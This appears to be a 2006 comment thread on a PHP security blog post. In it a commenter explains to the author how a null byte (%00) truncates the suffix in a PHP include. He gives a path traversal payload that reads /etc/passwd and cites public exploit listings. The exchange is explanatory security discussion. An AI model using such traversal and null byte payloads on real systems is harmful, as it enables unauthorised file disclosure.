Comments on: 2 Easy Steps to Increase Security in PHP
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/
Blog of a Programmer.
Sun, 22 Jun 2008 09:21:23 +0000

By: r0ut3r
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3489
Wed, 15 Nov 2006 13:41:28 +0000

you gonna find this interesting, heh:
—————————————
##################################################################################################
#                                                                                                #
#                                       r0ut3r Presents...                                       #
#                                                                                                #
#                                   Another r0ut3r discovery!                                    #
#                                                                                                #
# TorrentFlux 2.2 Arbitrary File Creation/Overwrite/Deletion & Command Execution Vulnerabilities #
#                                                                                                #
##################################################################################################

It’ll be on my site. :)
r0ut3r.

By: r0ut3r
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3485
Tue, 14 Nov 2006 11:17:32 +0000

"The ? in url starts the query string.

Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt"

Yes, but that's not what I am talking about.

Say you have a local file include vuln, like these ones:
http://milw0rm.com/exploits/2768
You see the vulnerable code there? And you see it adds .language.php on the end of the file?

.$setLang.'.language.php');

So if you just did a request like:
?lang=../../../etc/passwd
it will try and read the file:
/etc/passwd.language.php
Now that's going to create a problem and render this exploit practically useless.

Now to the point, with a little background. In many programming languages you can use null characters to do stuff, depending on what you need it to do, in C you use , and in PHP we use %00. Now what a null byte actually does, and is commonly used for, is stopping a string or function midway.

Note: I've only used a null byte in C once, and it was for an authentication script where I was trying to prevent some form of vulnerability, can't remember, a while ago. I've never used it in PHP except to assist in exploitation.

So back to the example; to stop the script from adding .language.php onto the end, it must be stopped half way. Therefore…

We will inject a null byte and stop it half way, preventing .language.php from being added, to do this it is done like so:
?lang=../../../etc/passwd%00

Does this make sense now?

r0ut3r (writ3r [ at ] gmail.com)

By: Steven Roddis
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3400
Sun, 05 Nov 2006 01:00:12 +0000

"meaning you would need to have a file named "evil?bar.php", but this is not the case, just inject a null value to make it stop half way through the include statement."

The ? in url starts the query string.

Ie. http://www.stevenroddis.com/evil.txt?87as
== http://www.stevenroddis.com/evil.txt

By: r0ut3r
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-3399
Sun, 05 Nov 2006 00:48:25 +0000

I was under the impression you were referring to this:
e.g. include($foo.'bar.php');

————————–
Now if $foo is set to 'http://www.stevenroddis.com/evil?'

The script grabs PHP code from "http://www.stevenroddis.com/evil?bar.php"
————————–
meaning you would need to have a file named "evil?bar.php", but this is not the case, just inject a null value to make it stop half way through the include statement.

And when you say "(Still with limitations such as the appending string)" - no need to worry about appending string if you use the method I described above ;)

That should help, if not, just send me an email. writ3r [ at ] gmail.com

By: Steven Roddis
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2572
Tue, 17 Oct 2006 06:35:06 +0000

And how are you going to do that?

$foo = 'bar';

include('/file.txt'.$foo);

??

By: r0ut3r
http://www.stevenroddis.com/2006/10/10/2-easy-steps-to-increase-security-in-php/#comment-2570
Mon, 16 Oct 2006 23:51:50 +0000

"But if URL fopen wrappers is off, then the hacker can only use files on your server. (Still with limitations such as the appending string)" - Not if you stop it midway through the include...
